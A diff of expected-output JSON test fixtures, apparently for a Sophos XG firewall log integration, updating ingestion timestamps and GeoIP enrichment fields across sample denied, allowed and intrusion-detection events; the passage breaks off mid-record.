@@ -5422,7 +5192,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715419100Z", + "ingested": "2021-12-14T14:54:45.179852999Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:40 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010102600002 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name=\"elastic@user.local\" user_gp=\"elastic.group.local\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"tun0\" out_interface=\"Port1\" src_mac=\"\" src_ip=10.82.234.6 src_country_code=\"\" dst_ip=192.168.0.1 dst_country_code=\"\" protocol=\"TCP\" src_port=60102 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010102600002", "kind": "event", @@ -5458,25 +5228,20 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 18, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "ruleset": "0", 
@@ -5488,19 +5253,14 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 55039, @@ -5575,7 +5335,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715424900Z", + "ingested": "2021-12-14T14:54:45.179853372Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:41 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010302602002 log_type=\"Firewall\" log_component=\"Appliance Access\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port2\" out_interface=\"\" src_mac=c4:f7:d5:b5:47:f4 src_ip=175.16.199.1 src_country_code=\"\" dst_ip=175.16.199.1 dst_country_code=\"\" protocol=\"TCP\" src_port=55039 dst_port=18 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010302602002", "kind": "event", 
@@ -5624,19 +5384,14 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 51826, @@ -5726,7 +5481,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715430600Z", + "ingested": "2021-12-14T14:54:45.179853820Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:42 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010102600002 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name=\"elastic@user.local\" user_gp=\"elastic.group.local\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=24:01:c7:07:2b:a2 src_ip=175.16.199.1 src_country_code=\"\" dst_ip=192.168.5.11 dst_country_code=\"\" protocol=\"TCP\" src_port=51826 dst_port=1109 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010102600002", "kind": "event", 
@@ -5775,19 +5530,14 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 3389, @@ -5863,7 +5613,7 @@ "event": { "duration": 0, "severity": 4, - "ingested": "2021-12-09T13:44:55.715436600Z", + "ingested": "2021-12-14T14:54:45.179854203Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:43 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010402403001 log_type=\"Firewall\" log_component=\"DoS Attack\" log_subtype=\"Denied\" status=\"Deny\" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"\" src_mac=34:db:fd:83:d8:09 src_ip=175.16.199.1 src_country_code=\"\" dst_ip=10.84.234.14 dst_country_code=\"\" protocol=\"UDP\" src_port=3389 dst_port=64465 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010402403001", "kind": "alert", 
@@ -5982,7 +5732,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715442500Z", + "ingested": "2021-12-14T14:54:45.179854564Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:44 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=012802605201 log_type=\"Firewall\" log_component=\"SSL VPN\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"tun0\" out_interface=\"\" src_mac=\"\" src_ip=10.82.234.9 src_country_code=\"\" dst_ip=10.82.234.11 dst_country_code=\"\" protocol=\"TCP\" src_port=58331 dst_port=56267 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "012802605201", "kind": "event", @@ -6018,25 +5768,20 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "ruleset": "2", 
@@ -6140,7 +5885,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715448300Z", + "ingested": "2021-12-14T14:54:45.179854936Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:45 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=0 fw_rule_id=61 policy_type=2 user_name=\"elastic@user.local\" user_gp=\"elastic.group.local\" iap=0 ips_policy_id=11 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"ipsec0\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=10.84.234.7 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"TCP\" src_port=58543 dst_port=443 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"VPN\" srczone=\"VPN\" dstzonetype=\"VPN\" dstzone=\"VPN\" dir_disp=\"\" connevent=\"Start\" connid=\"1615935064\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010101600001", "kind": "event", @@ -6176,19 +5921,14 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 0, 
@@ -6278,7 +6018,7 @@ "event": { "duration": 0, "severity": 5, - "ingested": "2021-12-09T13:44:55.715454200Z", + "ingested": "2021-12-14T14:54:45.179855312Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:45 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=018201500005 log_type=\"Firewall\" log_component=\"ICMP ERROR MESSAGE\" log_subtype=\"Allowed\" status=\"Allow\" priority=Notice duration=0 fw_rule_id=60 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=17 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"\" src_mac=34:db:fd:83:d8:09 src_ip=192.168.1.254 src_country_code=\"\" dst_ip=175.16.199.1 dst_country_code=\"\" protocol=\"ICMP\" icmp_type=3 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connevent=\"Interim\" connid=\"2685668438\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "018201500005", "kind": "event", @@ -6309,19 +6049,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 88, 
@@ -6339,19 +6074,14 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 61925, @@ -6436,7 +6166,7 @@ "event": { "duration": 10000000000, "severity": 6, - "ingested": "2021-12-09T13:44:55.715460200Z", + "ingested": "2021-12-14T14:54:45.179855770Z", "original": "device=\"SFW\" date=2020-06-05 time=12:38:53 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=10 fw_rule_id=60 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=17 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"ipsec0\" out_interface=\"Port1\" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"TCP\" src_port=61925 dst_port=88 sent_pkts=6 recv_pkts=6 sent_bytes=1802 recv_bytes=1732 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0srczonetype=\"VPN\" srczone=\"VPN\" dstzonetype=\"LAN\" dstzone=\"LAN\" dir_disp=\"\" connevent=\"Stop\" connid=\"1617126256\" vconnid=\"\" hb_health=\"NoHeartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0\"", "code": "010101600001", "kind": "event", 
@@ -6473,25 +6203,20 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "ruleset": "0", @@ -6567,7 +6292,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715466Z", + "ingested": "2021-12-14T14:54:45.179856141Z", "original": "device=\"SFW\" date=2018-05-30 time=13:26:37 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010202601001 log_type=\"Firewall\" log_component=\"Invalid Traffic\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol=\"UDP\" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"Invalid UDP destination.\" appresolvedby=\" Signature\"", "code": "010202601001", "kind": "event", 
@@ -6678,7 +6403,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715471900Z", + "ingested": "2021-12-14T14:54:45.179856523Z", "original": "device=\"SFW\" date=2018-06-04 time=17:20:24 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=011402601301 log_type=\"Firewall\" log_component=\"Fragmented Traffic\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=0.0.0.0 src_country_code= dst_ip=0.0.0.0 dst_country_code= protocol=\"0\" src_port=0 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"", "code": "011402601301", "kind": "event", 
@@ -6797,7 +6522,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715564300Z", + "ingested": "2021-12-14T14:54:45.179856909Z", "original": "device=\"SFW\" date=2018-05-30 time=14:01:32 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010302602002 log_type=\"Firewall\" log_component=\"Appliance Access\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=2 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port2.611\" out_interface=\"\" src_mac=c8:5b:76:ab:72:d3 src_ip=10.198.38.184 src_country_code= dst_ip=10.198.39.255 dst_country_code= protocol=\"UDP\" src_port=137 dst_port=137 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"", "code": "010302602002", "kind": "event", 
@@ -6916,7 +6641,7 @@ "event": { "duration": 0, "severity": 4, - "ingested": "2021-12-09T13:44:55.715571Z", + "ingested": "2021-12-14T14:54:45.179859074Z", "original": "device=\"SFW\" date=2018-05-30 time=14:17:17 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010402403001 log_type=\"Firewall\" log_component=\"DoS Attack\" log_subtype=\"Denied\" status=\"Deny\" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"\" src_mac=b8:97:5a:5b:0f:fd src_ip=10.198.32.19 src_country_code= dst_ip=10.198.32.48 dst_country_code= protocol=\"TCP\" src_port=41960 dst_port=22 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\" Signature\"", "code": "010402403001", "kind": "alert", 
@@ -7027,7 +6752,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715577Z", + "ingested": "2021-12-14T14:54:45.179859554Z", "original": "device=\"SFW\" date=2018-06-05 time=14:30:31 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010502604001 log_type=\"Firewall\" log_component=\"ICMP Redirection\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.37.23 src_country_code= dst_ip=10.198.36.48 dst_country_code= protocol=\"ICMP\" icmp_type=5 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\" Signature\"", "code": "010502604001", "kind": "event", @@ -7063,25 +6788,20 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "ruleset": "1", 
@@ -7156,7 +6876,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715583100Z", + "ingested": "2021-12-14T14:54:45.179859925Z", "original": "device=\"SFW\" date=2018-05-31 time=17:05:14 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010602605001 log_type=\"Firewall\" log_component=\"Source Routed\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol=\"TCP\" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"", "code": "010602605001", "kind": "alert", 
@@ -7276,7 +6996,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715589Z", + "ingested": "2021-12-14T14:54:45.179860298Z", "original": "device=\"SFW\" date=2018-05-30 time=15:09:51 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=011702605051 log_type=\"Firewall\" log_component=\"MAC Filter\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port2.531\" out_interface=\"\" src_mac=1e:3a:5a:5b:23:ab src_ip=fe80::59f5:3ce8:c98e:5062 src_country_code= dst_ip=ff02::1:2 dst_country_code= protocol=\"UDP\" src_port=546 dst_port=547 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"", "code": "011702605051", "kind": "event", 
@@ -7394,7 +7114,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715594900Z", + "ingested": "2021-12-14T14:54:45.179860667Z", "original": "device=\"SFW\" date=2018-06-01 time=10:57:55 timezone=\"BST\" device_name=\"XG310\" device_id=SFDemo-9a04c43 log_id=016602600006 log_type=\"Firewall\" log_component=\"Heartbeat\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name=\"\" user_gp=\"\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port3.611\" out_interface=\"\" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=10.198.32.19 dst_country_code= protocol=\"ICMP\" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"Red\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "016602600006", "kind": "event", @@ -7429,19 +7149,14 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 0, 
@@ -7529,7 +7244,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715600800Z", + "ingested": "2021-12-14T14:54:45.179861109Z", "original": "device=\"SFW\" date=2018-06-01 time=10:55:41 timezone=\"BST\" device_name=\"XG310\" device_id=SFDemo-9a04c43 log_id=016602600003 log_type=\"Firewall\" log_component=\"Heartbeat\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name=\"\" user_gp=\"\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port3.611\" out_interface=\"\" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol=\"ICMP\" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"Red\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "016602600003", "kind": "alert", @@ -7558,19 +7273,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, 
@@ -7584,19 +7294,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 41528, @@ -7654,7 +7359,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.715606900Z", + "ingested": "2021-12-14T14:54:45.179861538Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:54 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=1881 signature_msg=\"SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack\" classification=\"access to a potentially vulnerable web application\" rule_priority=2 src_ip=175.16.199.1 src_country_code=ROU dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"TCP\" src_port=41528 dst_port=80 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"server-webapp\" target=\"Server\"", "code": "020804407002", "kind": "alert", @@ -7681,19 +7386,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, 
@@ -7707,19 +7407,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 58914, @@ -7777,7 +7472,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.715612800Z", + "ingested": "2021-12-14T14:54:45.179861913Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:55 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name=\"\" signature_id=1616 signature_msg=\"PROTOCOL-DNS named version attempt\" classification=\"Attempted Information Leak\" rule_priority=1 src_ip=175.16.199.1 src_country_code=CHN dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"UDP\" 